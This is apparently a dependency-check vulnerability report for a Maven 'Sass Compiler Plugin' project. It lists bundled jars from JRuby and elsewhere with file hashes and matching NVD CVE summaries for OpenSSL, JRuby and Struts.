The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.

Vulnerable Software & Versions: (show all)

CVE-2009-3245  

Severity: High
CVSS Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

OpenSSL before 0.9.8m does not check for a NULL return value from bn_wexpand function calls in (1) crypto/bn/bn_div.c, (2) crypto/bn/bn_gf2m.c, (3) crypto/ec/ec2_smpl.c, and (4) engines/e_ubsec.c, which has unspecified impact and context-dependent attack vectors.

Vulnerable Software & Versions: (show all)

CVE-2009-1387  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence DTLS handshake message, related to a "fragment bug."

Vulnerable Software & Versions: (show all)

CVE-2009-1378  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

Multiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka "DTLS fragment handling memory leak."

Vulnerable Software & Versions: (show all)

CVE-2009-1377  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of "future epoch" DTLS records that are buffered in a queue, aka "DTLS record buffer limitation bug."

Vulnerable Software & Versions: (show all)

CVE-2009-0789  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

OpenSSL before 0.9.8k on WIN64 and certain other platforms does not properly handle a malformed ASN.1 structure, which allows remote attackers to cause a denial of service (invalid memory access and application crash) by placing this structure in the public key of a certificate, as demonstrated by an RSA public key.

Vulnerable Software & Versions: (show all)

CVE-2009-0590  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The ASN1_STRING_print_ex function in OpenSSL before 0.9.8k allows remote attackers to cause a denial of service (invalid memory access and application crash) via vectors that trigger printing of a (1) BMPString or (2) UniversalString with an invalid encoded length.

Vulnerable Software & Versions: (show all)

CVE-2008-7270  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8j, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the use of a disabled cipher via vectors involving sniffing network traffic to discover a session identifier, a different vulnerability than CVE-2010-4180.

Vulnerable Software & Versions: (show all)

CVE-2008-5077  

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
CWE: CWE-20 Improper Input Validation

OpenSSL 0.9.8i and earlier does not properly check the return value from the EVP_VerifyFinal function, which allows remote attackers to bypass validation of the certificate chain via a malformed SSL/TLS signature for DSA and ECDSA keys.

Vulnerable Software & Versions: (show all)

CVE-2007-5536  

Severity: Medium
CVSS Score: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)

Unspecified vulnerability in OpenSSL before A.00.09.07l on HP-UX B.11.11, B.11.23, and B.11.31 allows local users to cause a denial of service via unspecified vectors.

Vulnerable Software & Versions:

CVE-2007-3108  

Severity: Low
CVSS Score: 1.2 (AV:L/AC:H/Au:N/C:P/I:N/A:N)

The BN_from_montgomery function in crypto/bn/bn_mont.c in OpenSSL 0.9.8e and earlier does not properly perform Montgomery multiplication, which might allow local users to conduct a side-channel attack and retrieve RSA private keys.

Vulnerable Software & Versions:

CVE-2006-7250  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The mime_hdr_cmp function in crypto/asn1/asn_mime.c in OpenSSL 0.9.8t and earlier allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted S/MIME message.

Vulnerable Software & Versions: (show all)

CVE-2006-4343  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.

Vulnerable Software & Versions: (show all)

CVE-1999-0428  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls.

Vulnerable Software & Versions: (show all)

jruby-complete-9.1.2.0.jar: generator.jar

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/json/ext/generator.jar
MD5: 9a3d59c751290cace181e8de11a41755
SHA1: b5129f6559d9a45e91c39f2b9adcba8b2a823200

Identifiers

  • None

jruby-complete-9.1.2.0.jar: parser.jar

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/json/ext/parser.jar
MD5: 5d68c415bab614f7022b579f31fb850c
SHA1: ec58e349d82741d32b381f86b3a2e18892160aff

Identifiers

  • None

jruby-complete-9.1.2.0.jar: bcpkix-jdk15on-1.54.jar

Description: The Bouncy Castle Java APIs for CMS, PKCS, EAC, TSP, CMP, CRMF, OCSP, and certificate generation. This jar contains APIs for JDK 1.5 to JDK 1.8. The APIs can be used in conjunction with a JCE/JCA provider such as the one provided with the Bouncy Castle Cryptography APIs.

License:

Bouncy Castle Licence: http://www.bouncycastle.org/licence.html
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/org/bouncycastle/bcpkix-jdk15on/1.54/bcpkix-jdk15on-1.54.jar
MD5: ea8e906cfcda284d0ae934b82863862d
SHA1: b11bfee99bb11eea344de6e4a07fe89212c55c02

Identifiers

jruby-complete-9.1.2.0.jar: bcprov-jdk15on-1.54.jar

Description: The Bouncy Castle Crypto package is a Java implementation of cryptographic algorithms. This jar contains JCE provider and lightweight API for the Bouncy Castle Cryptography APIs for JDK 1.5 to JDK 1.8.

License:

Bouncy Castle Licence: http://www.bouncycastle.org/licence.html
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/org/bouncycastle/bcprov-jdk15on/1.54/bcprov-jdk15on-1.54.jar
MD5: 66a9905f98513cc5e53eabcc9af3c0fb
SHA1: 1acdedeb89f1d950d67b73d481eb7736df65eedb

Identifiers

  • cpe: cpe:/a:bouncycastle:bouncy-castle-crypto-package:1.54   Confidence:LOW   
  • cpe: cpe:/a:bouncycastle:bouncy_castle_crypto_package:1.54   Confidence:LOW   
  • maven: org.bouncycastle:bcprov-jdk15on:1.54   Confidence:HIGHEST

jruby-complete-9.1.2.0.jar: snakeyaml-1.14.jar

Description: YAML 1.1 parser and emitter for Java

License:

Apache License Version 2.0: LICENSE.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/org/yaml/snakeyaml/1.14/snakeyaml-1.14.jar
MD5: 1dd614fe1f1d9b6b5ef0fd2c1857e659
SHA1: c2df91929ed06a25001939929bff5120e0ea3fd4

Identifiers

jruby-complete-9.1.2.0.jar: psych.jar

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/psych.jar
MD5: 819c4b99eefabe587bbdfe8d2b2ee30d
SHA1: 7576dce2febe3a3dfde6d7d27a933da4d3ee7d4e

Identifiers

  • None

jruby-complete-9.1.2.0.jar: cparse-jruby.jar

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/racc/cparse-jruby.jar
MD5: 1d12831e62f838a59abb7b44a20c8686
SHA1: c5b876825b6cbe622111b07fc205515a2f782615

Identifiers

  • cpe: cpe:/a:jruby:jruby:-   Confidence:LOW   

CVE-2012-5370  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

JRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.

Vulnerable Software & Versions:

CVE-2011-4838  

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.

Vulnerable Software & Versions: (show all)

CVE-2010-1330  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The regular expression engine in JRuby before 1.4.1, when $KCODE is set to 'u', does not properly handle characters immediately after a UTF-8 character, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted string.

Vulnerable Software & Versions: (show all)

jruby-complete-9.1.2.0.jar: readline.jar

Description: readline extension for JRuby

License:

EPL-1.0
GPL-2.0
LGPL-2.1
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/readline.jar
MD5: 3e17099e843af31aec71300a22794da1
SHA1: ad217fe9fd89970a34877b129bf9f4e0baff6469

Identifiers

  • cpe: cpe:/a:jruby:jruby:1.0   Confidence:HIGHEST   
  • maven: rubygems:jruby-readline:1.0   Confidence:HIGH

CVE-2012-5370  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

JRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.

Vulnerable Software & Versions:

CVE-2011-4838  

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.

Vulnerable Software & Versions: (show all)

CVE-2010-1330  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The regular expression engine in JRuby before 1.4.1, when $KCODE is set to 'u', does not properly handle characters immediately after a UTF-8 character, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted string.

Vulnerable Software & Versions: (show all)

jruby-complete-9.1.2.0.jar: pr-zlib.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/truffle/pr-zlib/pr-zlib.gemspec
MD5: b4e286bddea3a9392a84741e887e8502
SHA1: e3998ae59fc214d52e03f21f7f72e6e93efb64bb

Identifiers

  • None

jruby-complete-9.1.2.0.jar: Rakefile

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/truffle/pr-zlib/Rakefile
MD5: 923ba4c739f59fa2b6868c442a4da16c
SHA1: 5c2705b05dd5c7f5d4927a864d3a36f4aef93017

Identifiers

  • None

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jffi/pom.xml

Description: Java Foreign Function Interface

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jffi/pom.xml
MD5: 1c0502b6d6f7a10b845979d2c4cdf6fa
SHA1: 5f9a05c00109c43896a44172aa04a4d4d9282d8d

Identifiers

  • maven: com.github.jnr:jffi:1.2.12   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-constants/pom.xml

Description: A set of platform constants (e.g. errno values)

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-constants/pom.xml
MD5: 90174e1e8e19f098ab2883d2de643cf5
SHA1: 2c34ee3a1470585746ae4b6eab16431c8ce3ed39

Identifiers

  • maven: com.github.jnr:jnr-constants:0.9.2   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-enxio/pom.xml

Description: Native I/O access for java

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-enxio/pom.xml
MD5: 9ebe3a4c20429571e7cda7283de9fb81
SHA1: 852badae5cc6b00220178ccc3559ed1fbde68cbb

Identifiers

  • maven: com.github.jnr:jnr-enxio:0.12   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-ffi/pom.xml

Description: A library for invoking native functions from java

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-ffi/pom.xml
MD5: 5a0daa9bba2f3e56d98ee20d19308eb0
SHA1: baf89fc73a1b3f6ebda9692670e8c2d62abf0e13

Identifiers

  • maven: com.github.jnr:jnr-ffi:2.0.9   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-netdb/pom.xml

Description: Lookup TCP and UDP services from java

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-netdb/pom.xml
MD5: 65c022a7f167f37c216e0620fcf04716
SHA1: 8d6ba3148bc79c4de8fe1db2f0b0e21e69556b76

Identifiers

  • maven: com.github.jnr:jnr-netdb:1.1.5   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-posix/pom.xml

Description:  Common cross-project/cross-platform POSIX APIs

License:

Common Public License - v 1.0: http://www-128.ibm.com/developerworks/library/os-cpl.html
GNU General Public License Version 2: http://www.gnu.org/copyleft/gpl.html
GNU Lesser General Public License Version 2.1: http://www.gnu.org/licenses/lgpl.html
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-posix/pom.xml
MD5: 4b9b9e407a133c8fd39a04108776152e
SHA1: 41ef86131a193c69f6e91a20f27882729ec0cf19

Identifiers

  • maven: com.github.jnr:jnr-posix:3.0.29   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-unixsocket/pom.xml

Description: Native I/O access for java

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-unixsocket/pom.xml
MD5: e75aa0f8e3affdf8ec18f03dd1a1c03d
SHA1: e4e84bb8c92f4baaaad22313b006e2b889899b11

Identifiers

  • maven: com.github.jnr:jnr-unixsocket:0.12   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-x86asm/pom.xml

Description: A pure-java X86 and X86_64 assembler

License:

MIT License: http://www.opensource.org/licenses/mit-license.php
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-x86asm/pom.xml
MD5: cb16b0b890c8b7a726a547ca0b58d00a
SHA1: 91de5c25955d1f321832738dce614b45e9939050

Identifiers

  • maven: com.github.jnr:jnr-x86asm:1.0.2   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.headius/invokebinder/pom.xml

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.headius/invokebinder/pom.xml
MD5: c89653bd4f654c04cd93caf555aa7aaa
SHA1: b13f370cefa8331b42c00dade00424e483a3d267

Identifiers

  • maven: com.headius:invokebinder:1.7   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.headius/options/pom.xml

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.headius/options/pom.xml
MD5: 71910d212b33ca5f3f5a8a2aff7c8785
SHA1: 51766d35193ffa3f9c131d574cf2570447607b95

Identifiers

  • maven: com.headius:options:1.4   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/com.jcraft/jzlib/pom.xml

Description: JZlib is a re-implementation of zlib in pure Java

License:

BSD: http://www.jcraft.com/jzlib/LICENSE.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.jcraft/jzlib/pom.xml
MD5: 856f139610c4e36c1b0bdb5ad007c2a5
SHA1: 6e6789004c70477a6e2ea92c066b757534e63a10

Identifiers

  • maven: com.jcraft:jzlib:1.1.3   Confidence:HIGH
  • cpe: cpe:/a:jcraft:jzlib:1.1.3   Confidence:LOW   

jruby-complete-9.1.2.0.jar/META-INF/maven/com.martiansoftware/nailgun-server/pom.xml

Description:  Nailgun is a client, protocol, and server for running Java programs from the command line without incurring the JVM startup overhead. Programs run in the server (which is implemented in Java), and are triggered by the client (written in C), which handles all I/O. This project contains the SERVER ONLY.

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/com.martiansoftware/nailgun-server/pom.xml
MD5: 365276754761735cc069e439a401fa8d
SHA1: 55ac54d56cbaa9468e964f4dc20b201cde1c611f

Identifiers

  • maven: com.martiansoftware:nailgun-server:0.9.1   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/joda-time/joda-time/pom.xml

Description: Date and time library to replace JDK date handling

License:

Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/joda-time/joda-time/pom.xml
MD5: e0e06bb183b503c9226aca0fe8a3f0fd
SHA1: f8df631ef5c18b7bc8560f7afb897cc6d9166067

Identifiers

  • maven: joda-time:joda-time:2.8.2   Confidence:HIGH

jruby-complete-9.1.2.0.jar/META-INF/maven/org.jruby.joni/joni/pom.xml

Description:  Java port of Oniguruma: http://www.geocities.jp/kosako3/oniguruma that uses byte arrays directly instead of java Strings and chars

License:

MIT License: http://www.opensource.org/licenses/mit-license.php
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/maven/org.jruby.joni/joni/pom.xml
MD5: 56582bba936c240658e561a53341590a
SHA1: d82a6ef409ac9f8dd68221f0db02eb4880ab0b82

Identifiers

  • maven: org.jruby.joni:joni:2.1.10   Confidence:HIGH

plexus-cipher-1.4.jar

File Path: /var/tmp/maven-repo/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.jar
MD5: 7b2d6fcf0d5800d5b1ce09d98d98dcaf
SHA1: 50ade46f23bb38cd984b4ec560c46223432aac38
Referenced In Project: Sass Compiler Plugin

Identifiers

plexus-sec-dispatcher-1.3.jar

File Path: /var/tmp/maven-repo/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.jar
MD5: 53160199f5667de3fca69b723173639b
SHA1: dedc02034fb8fcd7615d66593228cb71709134b4
Referenced In Project: Sass Compiler Plugin

Identifiers

oro-2.0.8.jar

File Path: /var/tmp/maven-repo/oro/oro/2.0.8/oro-2.0.8.jar
MD5: 42e940d5d2d822f4dc04c65053e630ab
SHA1: 5592374f834645c4ae250f4c9fbb314c9369d698
Referenced In Project: Sass Compiler Plugin

Identifiers

sslext-1.2-0.jar

License:

Apache Software License, Version 1.1: http://www.apache.org/licenses/LICENSE-1.1
File Path: /var/tmp/maven-repo/sslext/sslext/1.2-0/sslext-1.2-0.jar
MD5: fda7f2a2f7ac9b017a5de1a4742753fd
SHA1: c86a7db4ac0bc450e675f3d44b3d64cdc934361b
Referenced In Project: Sass Compiler Plugin

Identifiers

  • cpe: cpe:/a:apache:struts:1.2.0   Confidence:LOW   
  • maven: sslext:sslext:1.2-0   Confidence:HIGHEST

CVE-2006-1548  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.

Vulnerable Software & Versions:

CVE-2006-1547  

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)

ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.

Vulnerable Software & Versions: (show all)

CVE-2006-1546  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.

Vulnerable Software & Versions:

xmlunit-1.5.jar

Description: XMLUnit compares a control XML document to a test document or the result of a transformation, validates documents, and compares the results of XPath expressions.

License:

BSD License: http://xmlunit.svn.sourceforge.net/viewvc/*checkout*/xmlunit/trunk/xmlunit/LICENSE.txt
File Path: /var/tmp/maven-repo/xmlunit/xmlunit/1.5/xmlunit-1.5.jar
MD5: 99f2eb164a7609da9a77975843b09405
SHA1: 7789cef5caffdecab50fd6099535ad2bc2e98044
Referenced In Project: Sass Compiler Plugin

Identifiers



This report contains data retrieved from the National Vulnerability Database.